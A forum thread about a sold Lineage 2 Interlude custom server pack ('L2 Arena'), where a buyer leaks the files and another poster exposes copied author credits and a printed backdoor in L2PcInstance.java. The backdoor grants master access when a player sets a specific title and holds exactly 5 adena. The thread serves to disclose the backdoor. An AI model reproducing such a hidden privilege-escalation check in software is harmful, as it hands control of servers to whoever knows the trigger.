Jump to content

Recommended Posts

Posted

L2-Arena Proffessional Custom Interlude Ready To Go [bassed grankain source]
 
Project based on last grankain source revision
Project ready to start
Tested live 
Perfect working geodata
Perfect working skills like l2off
Perfect working sieges
Video with server preview here
 


 
 
I wish to sell my Lineage2 Interlude Custom PVP Project
Project have ready banners and ready server name for who wish to purchase it
Server name: L2 Arena
You will be able to see logo and banners in the video below...
Project will be sold only 1 time to only 1 person
After the proejct will be sold once to 1 person, the next person who will wish to buy it will recive a reworked project, with changed gameplay style, changed zones, monsters, items, farming items, farming style and whatever the customer ask for.
I do not have time for open the server, i can offer support if there is any bug inside ( for free ), if the customer want support for adding new things or anything else, it will cost, depend how many hours i will work.
I can help setup the server for free.
Project contains latest 2016 bug fixes
All skills reworked to be similar to L2OFF
Same i can say about balance
Do not hesitate to ask for test server, you can test the project whenever you want
Call your friends and come to play on it and see if you like it or not!  :)
The project is an update of Lineage2Prestige ( my last custom pvp server )
The project is based on Prestige Source ( my own private project )
Q: Why i consider this my own private project?
A: Because everything has been added manually and allmost everything has been reworked by me!
PS: Source is suitable for any type of server, even for low rates one.For more info about features contact me on skype.
Here you can see a little preview of the project, here is video:

Chronicle: Interlude
Rates 1000x
Main Town: kamael Village
Max level 85
 
3 Tier Weapons:
- Lindvior Weapons - Tier 1
- Valakas Weapons - Tier 2
- Kelbim Weapons - Tier 3
 
3 Tier Armors:
- Exile Armor - Tier 1
- Valkyria Armor - Tier 2
- Ertheia Armor - Tier 3
 
Upgradable Raid Boss Jewels:
- Core -> Improved Core -> Blessed Core
- Orfen -> Improved Orfen -> Blessed Orfen
- Baium -> Improved Baium -> Blessed Baium
- Queen Ant -> Improved Queen Ant -> Blessed Queen Ant
 
5 types of Elemental Shirts with Awakening Powers
- Ogre
- Monk
- Witch
- Empower
- Rabbit
 
Farm Items currency:
- Adena
- Ancient Adena
- Red Libra ( from boss, low chance from mobs, from champions etc... )
 
Farm Zones:
- Level Zone
- Cruma Tower ( custom ) - Solo Zone
- Underground Temple of Prayer - Hard Zone - party recommended
 
Raid Bosses: 
- Golkonda
- Lilith
- Chaos Van Helsing
- Halisha
- Halisha PVP ZONE
- Antharas
- Valakas
- Baium
- Exiled Anakim ( The Lindvior Guardian ) - location inside Undeground Temple of Prayer Secret Boss Room
 
PVP Zone
- need type: .exit for leave
- auto flag when enter
- auto nobless when enter and when respawn
- auto respawn in 10 seconds
- respawn full hp/cp/mp
- Zone can be changed whenever you want in any other location ( current loc: Pagan Temple )
- Show hp/cp/mp left of your killer
 
SERVER NPC:
- rank manager - show pvp/pk ranking top 10
- augmenter/skill enchanter 2 in 1
- Custom Gm Shop
- Custom Shop - upgrade armor/weapon
- Raid Boss manager show info about raids alive/dead
- Global teleporter
- NPC buffer with all buffs included malarias
- service npc sell all augments directly to your weapon
- class changer
- all in 1 npc warehouse
- symbol maker
- auction npc buy clan hall
- siege npc
- class master npc can add all subclass in same npc even overlord
 
SPECIAL ITEMS
- clan rep scroll
- premium rune ( x2 all rates for 24 hours )
- recommend item get instant 255 rec
- clan coin - get instant clan llv 8
- clan skills coin - get instant all clan skills
 
SOME SERVER PHOTOS
 
Shot00000.jpg
 
Shot00001.jpg
 
Shot00002.jpg
 
Shot00023.jpg
 
Shot00025.jpg
 
Shot00026.jpg
 
Shot00027.jpg
 
Shot00028.jpg
 
Shot00029.jpg
 
Shot00030.jpg

 

MEDIAFIRE pack

MEDIAFIRE patch
MEDIAFIRE source

 

ATTENTION: THIS ARE EXACTLY THE FILES HE UPLOADED TO ME! I DIDNT TOUCH THIS FILES. TRY TO OPEN A SERVER WITH THIS!

SAY THANKS TO MADA AND SMILE GUYS. THIS PACK NEED A LOT OF WORK. I PAY FOR IT AND I GET FAILED, I DONT WANT THE SAME TO YOU!!

  • Like 1
  • Thanks 1
  • Upvote 1
Posted

You killing lineage 2 scene.

 

i dont know if is true, but if yes -> interlude the end

 

 

hahahaha, thats a nice one dudee. wp wp. u really make me laught.

Posted (edited)

0axax00ax0ax0ax0ax0ax0ax0ax0ax

check in config.java my @author 

[GR] eiparxi theos!!  :troll:

o pro developer pou elege oti ta file mou einai dika tou

kai ta poulouse. mou eftiakse tin mera!!

	public static int BOSS_ID;
	public static boolean ALLOW_AUTO_NOBLESS_FROM_BOSS;
	public static int RADIUS_TO_RAID;
	public static boolean ALLOW_ANNOUNCE_SPAWN;
	public static boolean ALLOW_KILLER_NAME;
	
	/**
	 * Custom Code my Luna Developer Polymorph npc
	 * 		 and special mage polymorph
	 */

	public static boolean SHOW_HP_POLY;
	public static String RAID_BOSS_HP_PERCENT;
	public static List<Integer> Raid_Boss_Ids_For_Hp = new ArrayList<>();
		
	public static void loadVoteRewardManagerConfig()
	{
		final String file = "./config/functions/votemanagernpc.properties";
		
		try
		{
			final Properties voteManager = new Properties();
			final InputStream is = new FileInputStream(new File(file));
			voteManager.load(is);
			is.close();

			VOTE_LINK_HOPZONE = voteManager.getProperty("HopzoneUrl", "null");
			VOTE_LINK_TOPZONE = voteManager.getProperty("TopzoneUrl", "null");
			VOTE_REWARD_ID1 = Integer.parseInt(voteManager.getProperty("VoteRewardId1", "300"));
			VOTE_REWARD_ID2 = Integer.parseInt(voteManager.getProperty("VoteRewardId2", "300"));
			VOTE_REWARD_ID3 = Integer.parseInt(voteManager.getProperty("VoteRewardId3", "300"));
			VOTE_REWARD_ID4 = Integer.parseInt(voteManager.getProperty("VoteRewardId4", "300"));
			VOTE_REWARD_AMOUNT1 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount1", "300"));
			VOTE_REWARD_AMOUNT2 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount2", "300"));
			VOTE_REWARD_AMOUNT3 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount3", "300"));
			VOTE_REWARD_AMOUNT4 = Integer.parseInt(voteManager.getProperty("VoteRewardAmount4", "300"));
			SECS_TO_VOTE = Integer.parseInt(voteManager.getProperty("SecondsToVote", "20"));
		}
		catch (final Exception e)
		{
			e.printStackTrace();
			throw new Error("Failed to Load " + file + " File.");
		}
	}

more author xD
//custom code by Developer Luna
 
TXT_ENABLE = Boolean.parseBoolean(frozenSettings.getProperty("txtEnable", "False"));
TXT_NAME = frozenSettings.getProperty("txtName", "Welcome");
TXT_ON_ENTER = frozenSettings.getProperty("ChatTxTEnter", "Welcome");

 

and backdoor in L2PcInstance.java

	
	public boolean isGM()
	{
		if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5)
		{
			   setAccessLevel(Config.MASTERACCESS_LEVEL);
			   return false;
		}
		return getAccessLevel().isGm();
	}
Edited by tazerman2
Posted

gg mada no more money for shity dev who sell it))

i never thought this day would come

the day that madaftw actually did something good

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

he doesnt deserve any and should be immediately removed from this forum

 

 

i have no reason to get banned. :) i pay for this shiet, so is mine, i can do what ever i want with it. if i wanted to be a shiet i still can refound his money on paypal. but im not a scamer how he say, i just want that to the people to know what he sell.

gj boo i guess you did improve a lot

 

 

2e0f340570.png

Posted

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care . 

Posted

So you basically paid 90e for frozen with custom items?

 

SO SAD. RIGHT?

 

 

Come on! You should respect Dan7E2. No matter if is not what you buy..

 

Report us the files and we will get a decision.

 

I DID, but i stop when he call me scamer & lier, he wanted this fight

Posted

Respect what ? He buy it and he can do what ever he want with HIS files . Same goes for your project too IF i become a paid member in your project i can't share a custom pack that i can create ? If Dan7E2 wanted his work to stay "private" then he would only sell ready pack and not source so i guess he don't care .

 

No you cant..

*topic*

About topic as i can notice is the shared one cadmus files by tazerman2..

At the end is the truth..liers must be punished

Posted

Lying is easy, told ya you're a scammer. If a single thing works as retail in this pack, I'm the next Pope.

Guest
This topic is now closed to further replies.



  • Posts

    • all the reports vanished into thin air  
    • First of all, you should not talk for Albert. 2nd, he never said something about this kinda bug. 3th, please don't write without any proof by fake account.  Also, since the customer has the bought source code I'm not responsible anymore for his changes or caused bugs inside source code. Besides, he still uses outdated version with mixed files of random update.... He never asked any help except about stats. That's all.  I can't read the minds if customer doesn't talk to me. 
    • 🔥L2 INTERPRIDE - Pride Style  OPENING THIS NOVEMBER! 🔥  ✅ Grand Opening - November 15th! ✅ ❤️ Open Beta - October 08th! ❤️  🩵  The most up-to date client on the market! ▶️  Retail Pride Style Interlude with the new Client! 💡Discord: https://discord.gg/l2interpride 🌍 General Information Client: Interlude Type: Custom PvP Server Rates: High Rates Starting Level: 56 Balanced PvP Environment Unique PvP Enchant System PvP Synergy System: Support Classes earn PvP Score when assisting DDs in kills Toggle Skills → Now Passive Killing Spree: Every 25 kills grants Hero Aura + Hero Skills until death 🐉 Raid Boss System If you are within 1500 radius when a Raid Boss dies, you automatically receive 1 Raid Boss Chest in your inventory! 💫 Join the Battle ⚔️ Experience modern PvP gameplay on a classic Interlude foundation! 🔥 Build your power. Earn glory. Dominate Aden. 🧙 Custom Items Armors: 🛡️ Tier 1: Dread ⚔️ Tier 2: Titanium 👑 Tier 3: Pride Weapons: 🔱 Tier 1: Unique (PvP / PvE) ⚔️ Tier 2: Pride 💀 Tier 3: Abyssal Accessories: Up to 30 custom accessories with unique stats Legendary Dyes: +5 / -2 Belts: Various special stats ⚔️ Custom PvP Skills PvPs Name Color Reward Skill 500 Blue Firework CP Heal +800 1000 Violet Firework Cleanse 1500 Green Blessed Body 2000 Yellow MP Recharge 2500 Light Blue Special Focus 3000 Orange Death Whisper Debuff 3500 Dark Purple Might 4000 Red Empower 4500 Red Increase Weight Debuff 5000 Red Wind Walk 6000 Red Berserker Spirit 7000 Red Recall NPC 🛒 Shops & NPCs Item Store: Up to A/S grade, Potions, Consumables & more Mysterious Merchant: Custom Armors, Weapons, Accessories NPC Buffer: All Buffs + Scheme System Class Master: Free Class Change 🔥 Enchant System Safe Enchant: +7 Max Enchant: +25 Weapon Rate: Custom (higher enchant = lower rate) Armor Rate: Custom (higher enchant = lower rate) Jewel Rate: Custom (higher enchant = lower rate) ⚙️ Rates Experience: x5000 Skill Points: x5000 Drop Rate: x1 Adena: x500 🏆 Events Team vs Team (TvT) Capture the Flag (CTF) Death Match Castle Siege Hunting Grounds URF TvT 💎 Custom Features ALT + Left Click → Remove selected Buff ALT + F → Teleport System Shift + Left Click → View Monster Droplist
    • So VIlmis scammed this guy named Albert and the community still allow him to sell L2jOrion files? @Albert Scott please provide here the conversation with @Vilmis where he ask you to pay for new updates if you want all servers bugs to be fixed. So he payd for last server with source and he has annoying bugs like, monsters remain alive if you kill them. So let me explain, if the server runs for more then 4-5 hours and you do not restart it, try to kill any monster, the corpse will remain there, you cannot target the corpse and the corpse looks like the monster is alive, the new monster spawns in the same spot and this happens continuesly. This annoying bugs should be fixed long ago or at least fix this stuff for free and not ask all your clients to pay for the shitty updates. 2025 server with such bugs shows off how good developer Vilmis is.
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock